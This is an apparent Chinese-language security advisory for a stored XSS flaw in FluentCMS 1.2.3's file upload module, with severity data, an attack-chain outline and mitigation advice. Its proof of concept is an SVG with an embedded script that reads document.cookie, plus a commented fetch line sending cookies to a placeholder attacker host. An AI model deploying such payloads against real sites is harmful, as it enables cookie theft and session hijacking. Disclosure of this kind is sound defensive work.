CVE-2025-70842 CVSS 5.4 中危

CVE-2025-70842 FluentCMS存储型XSS漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-70842

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

FluentCMS

漏洞概述

FluentCMS 1.2.3 版本的文件管理模块存在存储型 XSS 漏洞。该漏洞允许经过身份验证的管理员上传包含恶意 JavaScript 代码的特制 SVG 文件。一旦文件上传成功，任何访问该图片直接 URL 的用户（包括未经身份验证的访问者）都会在其浏览器中触发恶意脚本的执行。

技术细节

该漏洞的根本原因在于 FluentCMS 的文件上传功能未对 SVG 文件内部内容进行有效的安全过滤。SVG 基于 XML 格式，支持嵌入 `<script>` 标签来执行 JavaScript。攻击者利用管理员权限构造恶意的 SVG 文件并上传至服务器。由于服务器缺乏对 SVG 中脚本的清洗机制，当其他用户通过浏览器请求该文件时，浏览器会将其解析为 XML/SVG 文档并执行其中的代码。这种攻击方式属于存储型 XSS，攻击载荷持久化存储在服务器端，通过诱导受害者访问特定链接实现攻击，可能导致用户 Cookie 窃取或会话劫持。

攻击链分析

STEP 1

步骤1

攻击者获取 FluentCMS 的管理员账户权限。

STEP 2

步骤2

攻击者访问文件管理模块，准备上传文件。

STEP 3

步骤3

攻击者上传一个预先构造好的包含恶意 JavaScript 代码的 SVG 文件。

STEP 4

步骤4

服务器接收并存储该文件，未检测或过滤其中的脚本内容。

STEP 5

步骤5

攻击者将存储的 SVG 文件的直接 URL 发送给目标受害者。

STEP 6

步骤6

受害者访问该链接，浏览器解析 SVG 并执行恶意代码，导致攻击发生。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC: Malicious SVG for Stored XSS in FluentCMS -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="red" />
  <script type="text/javascript">
    // Proof of Concept: Execute JavaScript when SVG is rendered
    alert('CVE-2025-70842 XSS Triggered: ' + document.cookie);
    
    // Example data exfiltration (commented out)
    // fetch('https://attacker-server.com/collect?q=' + encodeURIComponent(document.cookie));
  </script>
</svg>

影响范围

FluentCMS 1.2.3

防御指南

临时缓解措施

建议管理员暂时禁用对 SVG 文件的上传支持，或使用 WAF 规则拦截响应中的 SVG 内容类型，直到完成版本更新。同时，应审计服务器上已存在的 SVG 文件，确认是否包含恶意代码。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表